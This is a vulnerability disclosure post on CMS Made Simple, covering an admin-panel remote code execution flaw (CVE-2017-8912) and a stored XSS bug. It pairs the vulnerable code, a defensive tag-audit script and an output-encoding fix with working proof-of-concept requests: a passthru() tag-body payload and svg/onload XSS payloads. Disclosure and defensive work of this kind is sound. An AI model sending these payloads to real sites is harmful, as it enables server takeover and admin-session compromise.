One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.
Remote Code Execution – CVE-2017-8912
In admin/editusertag.php an administrator can create custom user defined tags whose body is arbitrary PHP. Dangerous functions such as passthru() are not blacklisted, so whatever is saved as the tag body is executed on the server.
[code language="text"]
POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1
[/code]
File: lib/classes/class.usertagoperations.inc.php
Line: 251
[code language="php" highlight="10"]
function CallUserTag($name, &$params)
{
    $row = $this->_get_from_cache($name);
    $result = FALSE;
    if( $row ) {
        $smarty = CmsApp::get_instance()->GetSmarty();
        // CreateTagFunction() defines (via eval) a PHP function from the stored tag body...
        $functionname = $this->CreateTagFunction($name);
        // ...and call_user_func_array() then runs it with the tag parameters and the Smarty instance.
        $result = call_user_func_array($functionname, array(&$params, &$smarty));
    }
    return $result;
}

function CreateTagFunction($name)
{
    $row = $this->_get_from_cache($name);
    if( !$row ) return;
    $functionname = 'cms_user_tag_'.$name;
    if( !function_exists($functionname) ) {
        // Strip an optional <?php ... ?> wrapper from the stored code.
        if( startswith($row['code'],'<?php') ) $row['code'] = substr($row['code'],5);
        if( endswith($row['code'],'?>') ) $row['code'] = substr($row['code'],0,-2);
        // The tag body is wrapped in a function definition and eval()'d verbatim:
        // whatever an admin saved as "code" runs with the web server's privileges.
        $code = 'function '.$functionname.'($params,&$smarty) {'.$row['code']."\n}";
        @eval($code);
    }
    return $functionname;
}
[/code]
'CreateTagFunction' wraps the stored tag body in a PHP function definition and passes it to eval(); 'CallUserTag' then invokes that function through call_user_func_array(), so the code we submitted as the tag body is executed on the server.
In a corporate network, once an attacker finds admin credentials by accessing the database and finds CMSMS, he can easily get a reverse shell on the box. Reminds me of some boxes in the PWK lab 😉
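Since the vendor treats eval() of the tag body as a feature, the practical control on the defending side is to watch what gets stored as a user defined tag. The following audit script is an added example, not CMSMS code: it tokenizes each stored tag body the way CreateTagFunction() would see it and reports direct calls to process-spawning or code-evaluating functions. The table and column names it assumes (cms_userplugins, userplugin_name, code) are inferred from the request parameters above; the sample rows are constructed.

```php
<?php
// Added audit script (not CMSMS code). Scans stored user defined tag bodies
// for direct calls to functions that spawn processes or evaluate code.
// Assumed schema: SELECT userplugin_name, code FROM cms_userplugins.

const DANGEROUS_FUNCTIONS = [
    'passthru', 'exec', 'shell_exec', 'system', 'proc_open', 'popen',
    'eval', 'assert', 'create_function', 'pcntl_exec',
];

/**
 * Return "name@line N" for every direct call to a dangerous function in a tag body.
 * The PHP tokenizer is used instead of a regex so that "exec" inside a comment or
 * string literal is ignored, while \passthru() and PASSTHRU() are still caught.
 */
function findDangerousCalls(string $udtCode): array
{
    // Mirror what CreateTagFunction() does with an optional <?php ... ?> wrapper,
    // then prepend an open tag so the tokenizer treats the body as PHP.
    $body = trim($udtCode);
    if (substr($body, 0, 5) === '<?php') $body = substr($body, 5);
    if (substr($body, -2) === '?>')      $body = substr($body, 0, -2);

    $tokens = token_get_all("<?php " . $body);
    $hits   = [];
    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) continue;              // single-character tokens such as "(" or ";"
        $isName = $tok[0] === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $tok[0] === T_NAME_FULLY_QUALIFIED); // \exec on PHP 8
        if (!$isName) continue;
        $name = strtolower(ltrim($tok[1], '\\'));
        if (!in_array($name, DANGEROUS_FUNCTIONS, true)) continue;
        // Require a following "(" so $exec or ['exec' => 1] are not reported.
        $j = $i + 1;
        while (isset($tokens[$j]) && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) $j++;
        if (isset($tokens[$j]) && $tokens[$j] === '(') {
            $hits[] = $name . '@line ' . $tok[2];
        }
    }
    return array_values(array_unique($hits));
}

/** Audit rows of ['userplugin_name' => ..., 'code' => ...]; returns tag name => hits. */
function auditUserTags(iterable $rows): array
{
    $report = [];
    foreach ($rows as $row) {
        $hits = findDangerousCalls((string) $row['code']);
        if ($hits) $report[$row['userplugin_name']] = $hits;
    }
    return $report;
}

// Constructed sample rows standing in for the database query above.
$sampleRows = [
    ['userplugin_name' => 'aaa',       'code' => "passthru('dir');"],   // the tag body from the request above
    ['userplugin_name' => 'hello',     'code' => '<?php echo "hello ".$params["name"]; ?>'],
    ['userplugin_name' => 'commented', 'code' => '// exec() appears only in this comment' . "\n" . 'return 1;'],
    ['userplugin_name' => 'fqn',       'code' => 'return \\shell_exec($params["cmd"]);'],
];

foreach (auditUserTags($sampleRows) as $tag => $hits) {
    echo "user tag '$tag': ", implode(', ', $hits), "\n";
}
```

Run it on a schedule (or from a database trigger) and alert on any new hit. It is a tripwire, not a boundary: a static scan misses dynamically built calls (`$f = 'sys'.'tem'; $f(...)`, call_user_func(), backtick operators), so it belongs alongside keeping the number of accounts allowed to edit user defined tags small, monitoring the admin panel's access log for editusertag.php, and treating CMSMS admin credentials as equivalent to a shell on the host.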
Stored XSS
File: admin/addgroup.php
Lines: 95, 99
[code language="php" highlight="3,7" htmlscript="true"]
<div class="pageoverflow">
<p class="pagetext"><label for="groupname">*<?php echo lang('name')?>:</label></p>
<p class="pageinput"><input type="text" id="groupname" name="group" maxlength="255" value="<?php echo $group?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><label for="description"><?php echo lang('description')?>:</label></p>
<p class="pageinput"><input type="text" id="description" name="description" maxlength="255" size="80" value="<?php echo $description?>" /></p>
</div>
[/code]
The 'groupname' and 'description' values are echoed straight into the value attributes without HTML encoding (no htmlspecialchars()), so a group name or description containing markup is rendered as-is, leading to stored XSS in the admin panel.
[code language="text"]
POST /cms/cmsimple/admin/addgroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cms/cmsimple/admin/addgroup.php?_sk_=92a32a8aaa87e958
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=92a32a8aaa87e958; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true
[/code]
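The fix at the sink is output encoding for the attribute context. The snippet below is an added example, not CMSMS code: it renders the two inputs from addgroup.php once as the original does and once through an attribute-encoding helper (attr() is my name, not a CMSMS function), using the decoded payloads from the request above as input so the difference is visible.

```php
<?php
// Added example (not CMSMS code): vulnerable vs. hardened rendering of the
// two form fields from admin/addgroup.php. attr() is a helper defined here.

/** Encode a string for safe placement inside a quoted HTML attribute value. */
function attr(string $s): string
{
    // ENT_QUOTES encodes both " and ' so the helper is safe in single- and
    // double-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
    // returning an empty string, which would silently blank the field.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable rendering: mirrors lines 95 and 99 of admin/addgroup.php (raw echo). */
function renderGroupFormVulnerable(string $group, string $description): string
{
    return '<input type="text" id="groupname" name="group" value="' . $group . '" />' . "\n"
         . '<input type="text" id="description" name="description" value="' . $description . '" />' . "\n";
}

/** Hardened rendering: every untrusted value passes through attr() at the sink. */
function renderGroupForm(string $group, string $description): string
{
    return '<input type="text" id="groupname" name="group" value="' . attr($group) . '" />' . "\n"
         . '<input type="text" id="description" name="description" value="' . attr($description) . '" />' . "\n";
}

// The URL-decoded field values from the request above.
$group       = '<svg/onload=alert(2)>';
$description = '"><svg/onload=alert(3)>';

echo "--- vulnerable ---\n", renderGroupFormVulnerable($group, $description);
echo "--- hardened ---\n",   renderGroupForm($group, $description);
```

In the vulnerable output the `">` prefix of the description payload closes the value attribute and the input tag, so the `<svg>` element that follows is parsed as markup; in the hardened output every `"`, `<` and `>` is turned into `&quot;`, `&lt;` and `&gt;` and the browser shows the payload as literal text in the field. Encoding at the sink, chosen per context (attribute here, text node or JavaScript string elsewhere), is the reliable control; input filtering on addgroup.php alone would leave every other place the group name is displayed unprotected.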
Disclosure Timeline
09-05-2017: Reported to the vendor
09-05-2017: Vendor doesn’t accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug 🙂
10-05-2017: Public disclosure
11-05-2017: Assigned CVE-2017-8912
https://www.exploit-db.com/exploits/41997/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8912
https://nvd.nist.gov/vuln/detail/CVE-2017-8912